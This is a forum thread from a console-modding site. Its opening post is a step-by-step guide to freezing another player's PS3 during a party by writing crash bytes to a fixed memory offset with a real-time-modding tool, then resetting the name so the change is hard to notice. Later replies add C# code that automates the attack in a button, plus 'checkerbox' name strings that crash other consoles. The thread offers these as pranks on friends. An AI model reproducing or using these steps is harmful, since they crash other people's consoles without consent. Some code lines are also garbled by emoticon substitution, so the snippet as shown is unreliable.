Post: How to freeze your friends PS3
10-19-2014, 06:03 PM #1
Crimzic
Do a barrel roll!
(adsbygoogle = window.adsbygoogle || []).push({}); 1. Don't groan at this post if you already know.
2. This is meant for the noob modders as myself.
3. Have fun with it.
4. This is my first tutorial / guide.! Smile
5. Yes, i know you can do the checkered box but if they already know about it then you can do this.
6. You dont have to use Debugger the rtm tool has a Dev tab. ( NO DEBUGGER NEEDED )
7.Its quick and simple, just type in letters and numbers and BOOM. >.<
----------------------------------------------------------------------

Ok, in this tutorial / guide for noob modders you will have b777x status tool: You must login or register to view this content.

What this does is it freezes your friends ps3. But they have to be host of a party.
1. Once the tool is downloaded connect for whatever you have. (Cex , Dex) and got to the Dev tab.
2. Once your in the dev tab you wanna go to offsets and type in --> 0x026C0658 (Those are zeros)
3. And below it you wanna press the bottom arrows were the 10 is till it goes to 5.
4. Then you wanna type in 5E 49 99 99 99 <--- Its a five
5. Then join whoever's party and press set.
6. NOTE: ONCE YOU HAVE PRESSED SET YOU WANNA HURRY UP AND GO TO THE NON-HOSTS TAB AND CLICK RESET ON THE NAME. <-- On the b777x tool
7. Have funn and see your friend get offline because his ps3 froze.
--------------------------------------------------------------------------
Please Don't Groan at this post its just for the nooby modder as myself and also this is my first tutorial! Have fun.

---------------------------------------------------------------------------
Credits: M33Not Happy or SadFirmware for the
Offsets.
(adsbygoogle = window.adsbygoogle || []).push({});

The following 6 users say thank you to Crimzic for this useful post:

Hunter926, iHaxel, IronMan?, ksa_7ooo7, Adrian, VMP
10-20-2014, 05:47 PM #11
Crimzic
Do a barrel roll!
My bad M33 i didnt know u made it sorry.. trey told me so i didnt know. ill add you to credits.!
10-20-2014, 05:55 PM #12
Crimzic
Do a barrel roll!
Originally posted by Geo View Post
I prefer preset checkerbox, less typing :troll:

Looool True but i prefer this if they know about the box and no debuger needed its a tool.! Happy
10-20-2014, 05:57 PM #13
Crimzic
Do a barrel roll!
Originally posted by OLDSCHOOLMODZHD View Post
you nub
small: ^H()

Medium: ^H[]

Large: ^H{}

Long: ^H{)

Tall: ^H(}

Anything with a ^ is a box lol. haha but thanks for the shapes ima use those! Happy
10-20-2014, 05:59 PM #14
Crimzic
Do a barrel roll!
Originally posted by Daniella View Post
SO this was your code :O Well, CheckBoard is easier :P i dont have time to go to debugger LMAO



Lol yea and you dont need debuger its a simplle rtm tool with 3 tabs and one is Dev and both Cex and Dex. So if your friends know about it join there party and freeze them haha
10-20-2014, 07:23 PM #15
One
At least I can fight
Originally posted by OLDSCHOOLMODZHD View Post
or you could just put one in stead of being a spastic.

i wasnt aware it worked with one so thanks i guess
11-23-2014, 01:32 AM #16
Hunter926
Little One
Why not just code this into a button like this?


    //Gets Current Name
string CurrName = PS3.Extension.ReadString(0x26C065Cool Man (aka Tustin);

//Sets Name To Freeze The Host
PS3.SetMemory(0x26C0658, new byte[] { 0x5E, 0x49, 0x99, 0x99, 0x99 });
System.Threading.Thread.Sleep(100);

//Sets Name To Original
PS3.Extension.WriteString(0x26C0658, CurrName);

The following 2 users say thank you to Hunter926 for this useful post:

Crimzic, Adrian
12-14-2014, 07:20 PM #17
Crimzic
Do a barrel roll!
Originally posted by hunter926 View Post
Why not just code this into a button like this?


    //Get's Current Name
byte[] RealName = Encoding.ASCII.GetBytes(PS3.Extension.ReadString(0x26C065Cool Man (aka Tustin));

//Sets Name To Freeze The Host
PS3.SetMemory(0x26C0658, new byte[] { 0x5E, 0x49, 0x99, 0x99, 0x99 });
System.Threading.Thread.Sleep(100);

//Sets Name To Original
Array.Resize(ref RealName, RealName.Length + 1);
PS3.SetMemory(0x26C0658, RealName);


i was looking back at the old posts i did and and found what u said lol i never thought of that
lol thats smart

The following user thanked Crimzic for this useful post:

Hunter926
12-21-2014, 12:15 PM #18
xJuno
Banned
lol worked Smile

Copyright © 2026, NextGenUpdate.
All Rights Reserved.

Gray NextGenUpdate Logo